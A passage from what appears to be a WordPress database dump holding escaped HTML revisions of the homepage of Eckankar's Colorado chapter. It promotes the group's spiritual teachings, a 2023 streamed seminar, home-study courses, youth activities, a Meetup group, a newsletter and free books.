class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 18px; text-align: center; color: #ad7a05;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Home','','inherit','closed','closed','','7160-revision-v1','','','2023-11-17 12:00:49','2023-11-17 19:00:49','',7160,'https://eckankar-colorado.org/?p=269398',0,'revision','',0),(269406,2,'2023-11-20 13:28:08','2023-11-20 20:28:08','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 